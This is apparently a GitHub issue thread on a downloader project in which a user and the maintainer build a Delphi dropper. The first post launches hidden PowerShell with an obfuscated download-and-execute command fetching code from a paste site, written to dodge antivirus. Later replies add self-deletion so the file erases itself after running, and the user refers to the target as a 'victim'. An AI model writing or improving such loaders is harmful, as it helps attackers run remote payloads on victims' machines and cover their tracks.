UnamDownloader icon indicating copy to clipboard operation
UnamDownloader copied to clipboard

Published 20 hours ago verified publisher icon UnamSanctam

Self Destruct Feature

Open msfcon5ol3 opened this issue 2 years ago • 9 comments

This code snipped below is Delphi based, I was gonna use C# but too many AV detections. Could you help me to add a self-destruct function to delete the file from the disk after execution. Thanks for your help.

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'IEX(New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘paste.ee/r/l2tlb/0’)', nil, SW_HIDE);
end.

msfcon5ol3 avatar Jan 20 '23 01:01 msfcon5ol3

In the powershell command add a delay and then a command to remove the file (itself).

UnamSanctam avatar Jan 20 '23 02:01 UnamSanctam

In the powershell command add a delay and then a command to remove the file (itself).

This worked but if there's a case in which the file is renamed by victim , this makes this command useless. What could I do here instead of using the file name as the method of deletion ?

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item payload.exe -Force', nil, SW_HIDE);
end.

msfcon5ol3 avatar Jan 20 '23 02:01 msfcon5ol3

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

UnamSanctam avatar Jan 20 '23 02:01 UnamSanctam

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Could you edit the code for me please I'm noob in Delphi ?

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

msfcon5ol3 avatar Jan 20 '23 02:01 msfcon5ol3

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

UnamSanctam avatar Jan 20 '23 03:01 UnamSanctam

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

image Thanks but compilation error, I'm still trying to fix it....

msfcon5ol3 avatar Jan 20 '23 03:01 msfcon5ol3

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

UnamSanctam avatar Jan 20 '23 10:01 UnamSanctam

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

Thanks finally it worked like charm, really appreciate your help. If you want you can add this as a new stub in UnamDownloader for the next release but you may have to add some delphi / pascal compiler to your repository and the other options such as start delay , fake error, run as admin etc.

msfcon5ol3 avatar Jan 20 '23 12:01 msfcon5ol3

No problem and great that it worked. And I probably won't use it since I'm planning on other things but thank you.

UnamSanctam avatar Jan 20 '23 15:01 UnamSanctam